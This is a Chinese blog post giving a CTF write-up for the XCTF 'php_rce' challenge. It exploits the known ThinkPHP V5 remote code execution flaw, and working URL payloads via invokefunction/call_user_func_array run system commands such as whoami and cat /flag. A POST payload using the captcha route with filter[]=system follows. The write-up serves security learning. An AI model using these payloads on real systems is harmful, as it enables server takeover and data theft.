本站vip特权 - 全站资源免费下载

限时特惠

攻防世界 php_rce

打开靶场地址就是这个样子

图片.png

用的是ThinkpPHP V5,我也懒得用扫描工具了,直接网上找漏洞

图片.png

试一下payload

index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

命令直接执行成功
图片.png

然后就构造获取flag的payload

一步一步获取flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("whoami");'

图片.png

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(%22whoami%22);%27

ge.3001.net/images/20210518/1621329454_60a3862ec29e823d5880b.png!small)

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(%22cat%20/flag%20/flag%22);%27

图片.png

未开启调试模式

http://127.0.0.1/thinkphp/thinkphp_5.0.22_with_extend/public/index.php?s=captcha

POST传入

_method=__construct&filter[]=system&method=get&get[]=whoami
漏洞

x微E-Cology WorkflowServiceXml RCE

2021-5-31 14:33:50

漏洞

记一次src挖洞实战——逻辑漏洞

2021-6-1 13:59:36

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索